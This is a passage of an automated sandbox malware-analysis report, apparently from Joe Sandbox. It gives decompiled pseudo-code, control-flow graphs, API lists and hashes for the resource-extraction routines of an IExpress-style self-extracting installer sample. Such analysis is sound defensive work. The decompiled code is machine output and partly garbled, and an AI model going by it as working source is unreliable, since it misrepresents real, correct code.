                                                                                                                                                                                                        • Instruction ID: cf13781c1ffcf952c122ec27dcd2d611bebea0298754f13fb84d4b0ed8fc9d06
                                                                                                                                                                                                        • Opcode Fuzzy Hash: b11e817378ebe02390b720db536c2ce21954295fecb5a09bb8fbf75a3504b924
                                                                                                                                                                                                        • Instruction Fuzzy Hash: C17171B1B00618AFEF16DB74CD86BFB77FCEB48340F5441AAF50596140EA349E868B64
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00A94FE0 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 121windowCOMMON
                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 374 a94fe0-a9501a call a9468f FindResourceA LoadResource LockResource 377 a95161-a95163 374->377 378 a95020-a95027 374->378 379 a95029-a95051 GetDlgItem ShowWindow GetDlgItem ShowWindow 378->379 380 a95057-a9505e call a94efd 378->380 379->380 383 a9507c-a950b4 380->383 384 a95060-a95077 call a944b9 380->384 389 a950e8-a95104 call a944b9 383->389 390 a950b6-a950da 383->390 388 a95107-a9510e 384->388 392 a9511d-a9511f 388->392 393 a95110-a95117 FreeResource 388->393 398 a95106 389->398 390->398 402 a950dc 390->402 395 a9513a-a95141 392->395 396 a95121-a95127 392->396 393->392 400 a9515f 395->400 401 a95143-a9514a 395->401 396->395 399 a95129-a95135 call a944b9 396->399 398->388 399->395 400->377 401->400 404 a9514c-a95159 SendMessageA 401->404 405 a950e3-a950e6 402->405 404->400 405->389 405->398
                                                                                                                                                                                                        C-Code - Quality: 77%
                                                                                                                                                                                                        			E00A94FE0(void* __edi, void* __eflags) {
				void* __ebx;
				void* _t8;
				struct HWND__* _t9;
				int _t10;
				void* _t12;
				struct HWND__* _t24;
				struct HWND__* _t27;
				intOrPtr _t29;
				void* _t33;
				int _t34;
				CHAR* _t36;
				int _t37;
				intOrPtr _t47;

				_t33 = __edi;
				_t36 = "CABINET";
				 *0xa99144 = E00A9468F(_t36, 0, 0);
				_t8 = LockResource(LoadResource(0, FindResourceA(0, _t36, 0xa)));
				 *0xa99140 = _t8;
				if(_t8 == 0) {
					return _t8;
				}
				_t9 =  *0xa98584; // 0x0
				if(_t9 != 0) {
					ShowWindow(GetDlgItem(_t9, 0x842), 0);
					ShowWindow(GetDlgItem( *0xa98584, 0x841), 5); // executed
				}
				_t10 = E00A94EFD(0, 0); // executed
				if(_t10 != 0) {
					__imp__#20(E00A94CA0, E00A94CC0, E00A94980, E00A94A50, E00A94AD0, E00A94B60, E00A94BC0, 1, 0xa99148, _t33);
					_t34 = _t10;
					if(_t34 == 0) {
						L8:
						_t29 =  *0xa99148; // 0x0
						_t24 =  *0xa98584; // 0x0
						E00A944B9(_t24, _t29 + 0x514, 0, 0, 0x10, 0);
						_t37 = 0;
						L9:
						goto L10;
					}
					__imp__#22(_t34, "*MEMCAB", 0xa91140, 0, E00A94CD0, 0, 0xa99140); // executed
					_t37 = _t10;
					if(_t37 == 0) {
						goto L9;
					}
					__imp__#23(_t34); // executed
					if(_t10 != 0) {
						goto L9;
					}
					goto L8;
				} else {
					_t27 =  *0xa98584; // 0x0
					E00A944B9(_t27, 0x4ba, 0, 0, 0x10, 0);
					_t37 = 0;
					L10:
					_t12 =  *0xa99140; // 0x0
					if(_t12 != 0) {
						FreeResource(_t12);
						 *0xa99140 = 0;
					}
					if(_t37 == 0) {
						_t47 =  *0xa991d8; // 0x0
						if(_t47 == 0) {
							E00A944B9(0, 0x4f8, 0, 0, 0x10, 0);
						}
					}
					if(( *0xa98a38 & 0x00000001) == 0 && ( *0xa99a34 & 0x00000001) == 0) {
						SendMessageA( *0xa98584, 0xfa1, _t37, 0);
					}
					return _t37;
				}
			}
















                                                                                                                                                                                                        0x00a94fe0
                                                                                                                                                                                                        0x00a94fe6
                                                                                                                                                                                                        0x00a94ff9
                                                                                                                                                                                                        0x00a9500d
                                                                                                                                                                                                        0x00a95013
                                                                                                                                                                                                        0x00a9501a
                                                                                                                                                                                                        0x00a95163
                                                                                                                                                                                                        0x00a95163
                                                                                                                                                                                                        0x00a95020
                                                                                                                                                                                                        0x00a95027
                                                                                                                                                                                                        0x00a95037
                                                                                                                                                                                                        0x00a95051
                                                                                                                                                                                                        0x00a95051
                                                                                                                                                                                                        0x00a95057
                                                                                                                                                                                                        0x00a9505e
                                                                                                                                                                                                        0x00a950a7
                                                                                                                                                                                                        0x00a950ad
                                                                                                                                                                                                        0x00a950b4
                                                                                                                                                                                                        0x00a950e8
                                                                                                                                                                                                        0x00a950e8
                                                                                                                                                                                                        0x00a950ee
                                                                                                                                                                                                        0x00a950ff
                                                                                                                                                                                                        0x00a95104
                                                                                                                                                                                                        0x00a95106
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a95106
                                                                                                                                                                                                        0x00a950cd
                                                                                                                                                                                                        0x00a950d3
                                                                                                                                                                                                        0x00a950da
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a950dd
                                                                                                                                                                                                        0x00a950e6
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a95060
                                                                                                                                                                                                        0x00a95060
                                                                                                                                                                                                        0x00a95070
                                                                                                                                                                                                        0x00a95075
                                                                                                                                                                                                        0x00a95107
                                                                                                                                                                                                        0x00a95107
                                                                                                                                                                                                        0x00a9510e
                                                                                                                                                                                                        0x00a95111
                                                                                                                                                                                                        0x00a95117
                                                                                                                                                                                                        0x00a95117
                                                                                                                                                                                                        0x00a9511f
                                                                                                                                                                                                        0x00a95121
                                                                                                                                                                                                        0x00a95127
                                                                                                                                                                                                        0x00a95135
                                                                                                                                                                                                        0x00a95135
                                                                                                                                                                                                        0x00a95127
                                                                                                                                                                                                        0x00a95141
                                                                                                                                                                                                        0x00a95159
                                                                                                                                                                                                        0x00a95159
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a9515f

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 00A9468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A946A0
                                                                                                                                                                                                          • Part of subcall function 00A9468F: SizeofResource.KERNEL32(00000000,00000000,?,00A92D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A946A9
                                                                                                                                                                                                          • Part of subcall function 00A9468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A946C3
                                                                                                                                                                                                          • Part of subcall function 00A9468F: LoadResource.KERNEL32(00000000,00000000,?,00A92D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A946CC
                                                                                                                                                                                                          • Part of subcall function 00A9468F: LockResource.KERNEL32(00000000,?,00A92D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A946D3
                                                                                                                                                                                                          • Part of subcall function 00A9468F: memcpy_s.MSVCRT ref: 00A946E5
                                                                                                                                                                                                          • Part of subcall function 00A9468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00A946EF
                                                                                                                                                                                                        • FindResourceA.KERNEL32(00000000,CABINET,0000000A), ref: 00A94FFE
                                                                                                                                                                                                        • LoadResource.KERNEL32(00000000,00000000), ref: 00A95006
                                                                                                                                                                                                        • LockResource.KERNEL32(00000000), ref: 00A9500D
                                                                                                                                                                                                        • GetDlgItem.USER32(00000000,00000842), ref: 00A95030
                                                                                                                                                                                                        • ShowWindow.USER32(00000000), ref: 00A95037
                                                                                                                                                                                                        • GetDlgItem.USER32(00000841,00000005), ref: 00A9504A
                                                                                                                                                                                                        • ShowWindow.USER32(00000000), ref: 00A95051
                                                                                                                                                                                                        • FreeResource.KERNEL32(00000000,00000000,00000010,00000000), ref: 00A95111
                                                                                                                                                                                                        • SendMessageA.USER32(00000FA1,00000000,00000000,00000000), ref: 00A95159
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.453037279.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.453020820.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453050867.0000000000A98000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_a90000_qu0t4ukLoN.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Resource$Find$FreeItemLoadLockShowWindow$MessageSendSizeofmemcpy_s
                                                                                                                                                                                                        • String ID: *MEMCAB$CABINET
                                                                                                                                                                                                        • API String ID: 1305606123-2642027498
                                                                                                                                                                                                        • Opcode ID: 0c0f0046fd7b892527b6491ea374b256950ee944b55dd7723262ed922cb99652
                                                                                                                                                                                                        • Instruction ID: 1e4a63e9f21d12e61d3883a5eef60a0892a6cc4067b0d032eec18e6b773eb9f2
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0c0f0046fd7b892527b6491ea374b256950ee944b55dd7723262ed922cb99652
                                                                                                                                                                                                        • Instruction Fuzzy Hash: CB3107B0B407017FEF209BB9AD8AF6736DCB708795F24061BB901A61A1DE788C038790
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00A92F1D Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 120libraryfileloaderCOMMON
                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 450 a92f1d-a92f3d 451 a92f6c-a92f73 call a95164 450->451 452 a92f3f-a92f46 450->452 459 a92f79-a92f80 call a955a0 451->459 460 a93041 451->460 454 a92f48 call a951e5 452->454 455 a92f5f-a92f66 call a93a3f 452->455 461 a92f4d-a92f4f 454->461 455->451 455->460 459->460 468 a92f86-a92fbe GetSystemDirectoryA call a9658a LoadLibraryA 459->468 464 a93043-a93053 call a96ce0 460->464 461->460 465 a92f55-a92f5d 461->465 465->451 465->455 472 a92fc0-a92fd4 GetProcAddress 468->472 473 a92ff7-a93004 FreeLibrary 468->473 472->473 474 a92fd6-a92fee DecryptFileA 472->474 475 a93017-a93024 SetCurrentDirectoryA 473->475 476 a93006-a9300c 473->476 474->473 489 a92ff0-a92ff5 474->489 477 a93054-a9305a 475->477 478 a93026-a9303c call a944b9 call a96285 475->478 476->475 479 a9300e call a9621e 476->479 483 a9305c call a93b26 477->483 484 a93065-a9306c 477->484 478->460 485 a93013-a93015 479->485 495 a93061-a93063 483->495 486 a9307c-a93089 484->486 487 a9306e-a93075 call a9256d 484->487 485->460 485->475 492 a9308b-a93091 486->492 493 a930a1-a930a9 486->493 496 a9307a 487->496 489->473 492->493 497 a93093 call a93ba2 492->497 499 a930ab-a930ad 493->499 500 a930b4-a930b7 493->500 495->460 495->484 496->486 503 a93098-a9309a 497->503 499->500 502 a930af call a94169 499->502 500->464 502->500 503->460 505 a9309c 503->505 505->493
                                                                                                                                                                                                        C-Code - Quality: 82%
                                                                                                                                                                                                        			E00A92F1D(void* __ecx, int __edx) {
				signed int _v8;
				char _v272;
				_Unknown_base(*)()* _v276;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t9;
				void* _t11;
				struct HWND__* _t12;
				void* _t14;
				int _t21;
				signed int _t22;
				signed int _t25;
				intOrPtr* _t26;
				signed int _t27;
				void* _t30;
				_Unknown_base(*)()* _t31;
				void* _t34;
				struct HINSTANCE__* _t36;
				intOrPtr _t41;
				intOrPtr* _t44;
				signed int _t46;
				int _t47;
				void* _t58;
				void* _t59;

				_t43 = __edx;
				_t9 =  *0xa98004; // 0x6298f871
				_v8 = _t9 ^ _t46;
				if( *0xa98a38 != 0) {
					L5:
					_t11 = E00A95164(_t52);
					_t53 = _t11;
					if(_t11 == 0) {
						L16:
						_t12 = 0;
						L17:
						return E00A96CE0(_t12, _t36, _v8 ^ _t46, _t43, _t44, _t45);
					}
					_t14 = E00A955A0(_t53); // executed
					if(_t14 == 0) {
						goto L16;
					} else {
						_t45 = 0x105;
						GetSystemDirectoryA( &_v272, 0x105);
						_t43 = 0x105;
						_t40 =  &_v272;
						E00A9658A( &_v272, 0x105, "advapi32.dll");
						_t36 = LoadLibraryA( &_v272);
						_t44 = 0;
						if(_t36 != 0) {
							_t31 = GetProcAddress(_t36, "DecryptFileA");
							_v276 = _t31;
							if(_t31 != 0) {
								_t45 = _t47;
								_t40 = _t31;
								 *0xa9a288("C:\Users\hardz\AppData\Local\Temp\IXP000.TMP\", 0); // executed
								_v276();
								if(_t47 != _t47) {
									_t40 = 4;
									asm("int 0x29");
								}
							}
						}
						FreeLibrary(_t36);
						_t58 =  *0xa98a24 - _t44; // 0x0
						if(_t58 != 0) {
							L14:
							_t21 = SetCurrentDirectoryA("C:\Users\hardz\AppData\Local\Temp\IXP000.TMP\"); // executed
							if(_t21 != 0) {
								__eflags =  *0xa98a2c - _t44; // 0x0
								if(__eflags != 0) {
									L20:
									__eflags =  *0xa98d48 & 0x000000c0;
									if(( *0xa98d48 & 0x000000c0) == 0) {
										_t41 =  *0xa99a40; // 0x3, executed
										_t26 = E00A9256D(_t41); // executed
										_t44 = _t26;
									}
									_t22 =  *0xa98a24; // 0x0
									 *0xa99a44 = _t44;
									__eflags = _t22;
									if(_t22 != 0) {
										L26:
										__eflags =  *0xa98a38;
										if( *0xa98a38 == 0) {
											__eflags = _t22;
											if(__eflags == 0) {
												E00A94169(__eflags);
											}
										}
										_t12 = 1;
										goto L17;
									} else {
										__eflags =  *0xa99a30 - _t22; // 0x0
										if(__eflags != 0) {
											goto L26;
										}
										_t25 = E00A93BA2(); // executed
										__eflags = _t25;
										if(_t25 == 0) {
											goto L16;
										}
										_t22 =  *0xa98a24; // 0x0
										goto L26;
									}
								}
								_t27 = E00A93B26(_t40, _t44);
								__eflags = _t27;
								if(_t27 == 0) {
									goto L16;
								}
								goto L20;
							}
							_t43 = 0x4bc;
							E00A944B9(0, 0x4bc, _t44, _t44, 0x10, _t44);
							 *0xa99124 = E00A96285();
							goto L16;
						}
						_t59 =  *0xa99a30 - _t44; // 0x0
						if(_t59 != 0) {
							goto L14;
						}
						_t30 = E00A9621E(); // executed
						if(_t30 == 0) {
							goto L16;
						}
						goto L14;
					}
				}
				_t49 =  *0xa98a24;
				if( *0xa98a24 != 0) {
					L4:
					_t34 = E00A93A3F(_t51);
					_t52 = _t34;
					if(_t34 == 0) {
						goto L16;
					}
					goto L5;
				}
				if(E00A951E5(_t49) == 0) {
					goto L16;
				}
				_t51 =  *0xa98a38;
				if( *0xa98a38 != 0) {
					goto L5;
				}
				goto L4;
			}




























                                                                                                                                                                                                        0x00a92f1d
                                                                                                                                                                                                        0x00a92f28
                                                                                                                                                                                                        0x00a92f2f
                                                                                                                                                                                                        0x00a92f3d
                                                                                                                                                                                                        0x00a92f6c
                                                                                                                                                                                                        0x00a92f6c
                                                                                                                                                                                                        0x00a92f71
                                                                                                                                                                                                        0x00a92f73
                                                                                                                                                                                                        0x00a93041
                                                                                                                                                                                                        0x00a93041
                                                                                                                                                                                                        0x00a93043
                                                                                                                                                                                                        0x00a93053
                                                                                                                                                                                                        0x00a93053
                                                                                                                                                                                                        0x00a92f79
                                                                                                                                                                                                        0x00a92f80
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a92f86
                                                                                                                                                                                                        0x00a92f86
                                                                                                                                                                                                        0x00a92f93
                                                                                                                                                                                                        0x00a92f9e
                                                                                                                                                                                                        0x00a92fa0
                                                                                                                                                                                                        0x00a92fa6
                                                                                                                                                                                                        0x00a92fb8
                                                                                                                                                                                                        0x00a92fba
                                                                                                                                                                                                        0x00a92fbe
                                                                                                                                                                                                        0x00a92fc6
                                                                                                                                                                                                        0x00a92fcc
                                                                                                                                                                                                        0x00a92fd4
                                                                                                                                                                                                        0x00a92fd6
                                                                                                                                                                                                        0x00a92fd8
                                                                                                                                                                                                        0x00a92fe0
                                                                                                                                                                                                        0x00a92fe6
                                                                                                                                                                                                        0x00a92fee
                                                                                                                                                                                                        0x00a92ff0
                                                                                                                                                                                                        0x00a92ff5
                                                                                                                                                                                                        0x00a92ff5
                                                                                                                                                                                                        0x00a92fee
                                                                                                                                                                                                        0x00a92fd4
                                                                                                                                                                                                        0x00a92ff8
                                                                                                                                                                                                        0x00a92ffe
                                                                                                                                                                                                        0x00a93004
                                                                                                                                                                                                        0x00a93017
                                                                                                                                                                                                        0x00a9301c
                                                                                                                                                                                                        0x00a93024
                                                                                                                                                                                                        0x00a93054
                                                                                                                                                                                                        0x00a9305a
                                                                                                                                                                                                        0x00a93065
                                                                                                                                                                                                        0x00a93065
                                                                                                                                                                                                        0x00a9306c
                                                                                                                                                                                                        0x00a9306e
                                                                                                                                                                                                        0x00a93075
                                                                                                                                                                                                        0x00a9307a
                                                                                                                                                                                                        0x00a9307a
                                                                                                                                                                                                        0x00a9307c
                                                                                                                                                                                                        0x00a93081
                                                                                                                                                                                                        0x00a93087
                                                                                                                                                                                                        0x00a93089
                                                                                                                                                                                                        0x00a930a1
                                                                                                                                                                                                        0x00a930a1
                                                                                                                                                                                                        0x00a930a9
                                                                                                                                                                                                        0x00a930ab
                                                                                                                                                                                                        0x00a930ad
                                                                                                                                                                                                        0x00a930af
                                                                                                                                                                                                        0x00a930af
                                                                                                                                                                                                        0x00a930ad
                                                                                                                                                                                                        0x00a930b6
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a9308b
                                                                                                                                                                                                        0x00a9308b
                                                                                                                                                                                                        0x00a93091
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a93093
                                                                                                                                                                                                        0x00a93098
                                                                                                                                                                                                        0x00a9309a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a9309c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a9309c
                                                                                                                                                                                                        0x00a93089
                                                                                                                                                                                                        0x00a9305c
                                                                                                                                                                                                        0x00a93061
                                                                                                                                                                                                        0x00a93063
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a93063
                                                                                                                                                                                                        0x00a9302b
                                                                                                                                                                                                        0x00a93032
                                                                                                                                                                                                        0x00a9303c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a9303c
                                                                                                                                                                                                        0x00a93006
                                                                                                                                                                                                        0x00a9300c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a9300e
                                                                                                                                                                                                        0x00a93015
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a93015
                                                                                                                                                                                                        0x00a92f80
                                                                                                                                                                                                        0x00a92f3f
                                                                                                                                                                                                        0x00a92f46
                                                                                                                                                                                                        0x00a92f5f
                                                                                                                                                                                                        0x00a92f5f
                                                                                                                                                                                                        0x00a92f64
                                                                                                                                                                                                        0x00a92f66
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a92f66
                                                                                                                                                                                                        0x00a92f4f
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a92f55
                                                                                                                                                                                                        0x00a92f5d
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetSystemDirectoryA.KERNEL32 ref: 00A92F93
                                                                                                                                                                                                        • LoadLibraryA.KERNEL32(?,advapi32.dll), ref: 00A92FB2
                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,DecryptFileA), ref: 00A92FC6
                                                                                                                                                                                                        • DecryptFileA.ADVAPI32 ref: 00A92FE6
                                                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 00A92FF8
                                                                                                                                                                                                        • SetCurrentDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 00A9301C
                                                                                                                                                                                                          • Part of subcall function 00A951E5: LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00A92F4D,?,00000002,00000000), ref: 00A95201
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.453037279.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.453020820.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453050867.0000000000A98000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_a90000_qu0t4ukLoN.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: DirectoryLibrary$AddressAllocCurrentDecryptFileFreeLoadLocalProcSystem
                                                                                                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$DecryptFileA$advapi32.dll
                                                                                                                                                                                                        • API String ID: 2126469477-58291647
                                                                                                                                                                                                        • Opcode ID: 331c74a5879df588b9ec5ec279f50c3142a03ecd63a02de67d1593419ec899d7
                                                                                                                                                                                                        • Instruction ID: a833c30ea14a48bec16a2f618b59078a450034adc6ff38a11f344684fa0940af
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 331c74a5879df588b9ec5ec279f50c3142a03ecd63a02de67d1593419ec899d7
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3241A832B00205AADF30EBB99D4976B33F8EB55790F11016BE941C2591EF78CE82CB65
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00A95467 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 101COMMON
                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 522 a95467-a95484 523 a9548a-a95490 call a953a1 522->523 524 a9551c-a95528 call a91680 522->524 527 a95495-a95497 523->527 528 a9552d-a95539 call a958c8 524->528 529 a9549d-a954c0 call a91781 527->529 530 a95581-a95583 527->530 537 a9553b-a95545 CreateDirectoryA 528->537 538 a9554d-a95552 528->538 539 a9550c-a9551a call a9658a 529->539 540 a954c2-a954d8 GetSystemInfo 529->540 533 a9558d-a9559d call a96ce0 530->533 542 a95577-a9557c call a96285 537->542 543 a95547 537->543 544 a95585-a9558b 538->544 545 a95554-a95557 call a9597d 538->545 539->528 548 a954da-a954dd 540->548 549 a954fe 540->549 542->530 543->538 544->533 555 a9555c-a9555e 545->555 553 a954df-a954e2 548->553 554 a954f7-a954fc 548->554 556 a95503-a95507 call a9658a 549->556 558 a954f0-a954f5 553->558 559 a954e4-a954e7 553->559 554->556 555->544 560 a95560-a95566 555->560 556->539 558->556 559->539 562 a954e9-a954ee 559->562 560->530 561 a95568-a95575 RemoveDirectoryA 560->561 561->530 562->556
                                                                                                                                                                                                        C-Code - Quality: 75%
                                                                                                                                                                                                        			E00A95467(CHAR* __ecx, void* __edx, char* _a4) {
				signed int _v8;
				char _v268;
				struct _SYSTEM_INFO _v304;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t10;
				void* _t13;
				intOrPtr _t14;
				void* _t16;
				void* _t20;
				signed int _t26;
				void* _t28;
				void* _t29;
				CHAR* _t48;
				signed int _t49;
				intOrPtr _t61;

				_t10 =  *0xa98004; // 0x6298f871
				_v8 = _t10 ^ _t49;
				_push(__ecx);
				if(__edx == 0) {
					_t48 = 0xa991e4;
					_t42 = 0x104;
					E00A91680(0xa991e4, 0x104);
					L14:
					_t13 = E00A958C8(_t48); // executed
					if(_t13 != 0) {
						L17:
						_t42 = _a4;
						if(_a4 == 0) {
							L23:
							 *0xa99124 = 0;
							_t14 = 1;
							L24:
							return E00A96CE0(_t14, 0, _v8 ^ _t49, _t42, 1, _t48);
						}
						_t16 = E00A9597D(_t48, _t42, 1, 0); // executed
						if(_t16 != 0) {
							goto L23;
						}
						_t61 =  *0xa98a20; // 0x0
						if(_t61 != 0) {
							 *0xa98a20 = 0;
							RemoveDirectoryA(_t48);
						}
						L22:
						_t14 = 0;
						goto L24;
					}
					if(CreateDirectoryA(_t48, 0) == 0) {
						 *0xa99124 = E00A96285();
						goto L22;
					}
					 *0xa98a20 = 1;
					goto L17;
				}
				_t42 =  &_v268;
				_t20 = E00A953A1(__ecx,  &_v268); // executed
				if(_t20 == 0) {
					goto L22;
				}
				_push(__ecx);
				_t48 = 0xa991e4;
				E00A91781(0xa991e4, 0x104, __ecx,  &_v268);
				if(( *0xa99a34 & 0x00000020) == 0) {
					L12:
					_t42 = 0x104;
					E00A9658A(_t48, 0x104, 0xa91140);
					goto L14;
				}
				GetSystemInfo( &_v304);
				_t26 = _v304.dwOemId & 0x0000ffff;
				if(_t26 == 0) {
					_push("i386");
					L11:
					E00A9658A(_t48, 0x104);
					goto L12;
				}
				_t28 = _t26 - 1;
				if(_t28 == 0) {
					_push("mips");
					goto L11;
				}
				_t29 = _t28 - 1;
				if(_t29 == 0) {
					_push("alpha");
					goto L11;
				}
				if(_t29 != 1) {
					goto L12;
				}
				_push("ppc");
				goto L11;
			}




















                                                                                                                                                                                                        0x00a95472
                                                                                                                                                                                                        0x00a95479
                                                                                                                                                                                                        0x00a95481
                                                                                                                                                                                                        0x00a95484
                                                                                                                                                                                                        0x00a9551c
                                                                                                                                                                                                        0x00a95521
                                                                                                                                                                                                        0x00a95528
                                                                                                                                                                                                        0x00a9552d
                                                                                                                                                                                                        0x00a9552f
                                                                                                                                                                                                        0x00a95539
                                                                                                                                                                                                        0x00a9554d
                                                                                                                                                                                                        0x00a9554d
                                                                                                                                                                                                        0x00a95552
                                                                                                                                                                                                        0x00a95585
                                                                                                                                                                                                        0x00a95585
                                                                                                                                                                                                        0x00a9558b
                                                                                                                                                                                                        0x00a9558d
                                                                                                                                                                                                        0x00a9559d
                                                                                                                                                                                                        0x00a9559d
                                                                                                                                                                                                        0x00a95557
                                                                                                                                                                                                        0x00a9555e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a95560
                                                                                                                                                                                                        0x00a95566
                                                                                                                                                                                                        0x00a95569
                                                                                                                                                                                                        0x00a9556f
                                                                                                                                                                                                        0x00a9556f
                                                                                                                                                                                                        0x00a95581
                                                                                                                                                                                                        0x00a95581
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a95581
                                                                                                                                                                                                        0x00a95545
                                                                                                                                                                                                        0x00a9557c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a9557c
                                                                                                                                                                                                        0x00a95547
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a95547
                                                                                                                                                                                                        0x00a9548a
                                                                                                                                                                                                        0x00a95490
                                                                                                                                                                                                        0x00a95497
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a9549d
                                                                                                                                                                                                        0x00a954ab
                                                                                                                                                                                                        0x00a954b4
                                                                                                                                                                                                        0x00a954c0
                                                                                                                                                                                                        0x00a9550c
                                                                                                                                                                                                        0x00a95511
                                                                                                                                                                                                        0x00a95515
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a95515
                                                                                                                                                                                                        0x00a954c9
                                                                                                                                                                                                        0x00a954d6
                                                                                                                                                                                                        0x00a954d8
                                                                                                                                                                                                        0x00a954fe
                                                                                                                                                                                                        0x00a95503
                                                                                                                                                                                                        0x00a95507
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a95507
                                                                                                                                                                                                        0x00a954da
                                                                                                                                                                                                        0x00a954dd
                                                                                                                                                                                                        0x00a954f7
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a954f7
                                                                                                                                                                                                        0x00a954df
                                                                                                                                                                                                        0x00a954e2
                                                                                                                                                                                                        0x00a954f0
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a954f0
                                                                                                                                                                                                        0x00a954e7
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a954e9
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
